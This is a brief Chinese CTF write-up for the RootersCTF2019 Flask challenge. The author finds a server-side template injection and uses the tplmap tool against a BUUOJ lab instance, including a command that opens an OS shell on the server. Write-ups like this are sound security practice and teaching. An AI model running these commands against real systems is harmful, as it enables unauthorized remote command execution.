刷题笔记:[RootersCTF2019]I_<3_Flask


前言

关键字:[flask|ssti]

可见flask,盲猜一手ssti

题解

粗略看了一圈,没发现什么,扫扫目录试试

扫了一圈没发现啥,照着SSTI路子走吧。

得,还真是

也可以拿arjun跑一下

直接跑tplmap吧

python2 tplmap.py -u http://adce423c-3166-4725-b1ae-eb79b910f76a.node4.buuoj.cn/?name=123

注意要么用双引号,要么不加引号,单引号会报这个错误,估计类似于PHP那种单引号当纯字符串,双引号才能解析的情况

[!][tplmap] Exiting: No connection adapters were found for

python2 tplmap.py -u http://adce423c-3166-4725-b1ae-eb79b910f76a.node4.buuoj.cn/?name=123 --os-shell

结束

奇文共赏

Server-Side Template Injection


文章作者: 巡璃
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 巡璃 !
评论
  目录